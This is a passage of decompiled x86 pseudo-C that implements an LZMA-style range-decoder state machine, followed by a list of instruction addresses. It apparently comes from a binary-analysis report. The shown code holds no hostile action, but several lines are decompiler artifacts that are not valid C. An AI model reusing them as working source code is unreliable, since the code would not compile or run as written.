												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                          0x00000000
                                          0x00406ffe
                                          0x00406ffe
                                          0x00407002
                                          0x00407023
                                          0x0040702a
                                          0x00407030
                                          0x00407036
                                          0x00407048
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407004
                                          0x0040700a
                                          0x004073cb
                                          0x004073cb
                                          0x004073cb
                                          0x004073ce
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x004075e5
                                          0x004075ed
                                          0x004075f4
                                          0x004075f6
                                          0x004075fd
                                          0x00407601
                                          0x00407601
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743e
                                          0x00407441
                                          0x00407441
                                          0x00407447
                                          0x00407447
                                          0x00406be3
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x00000000
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
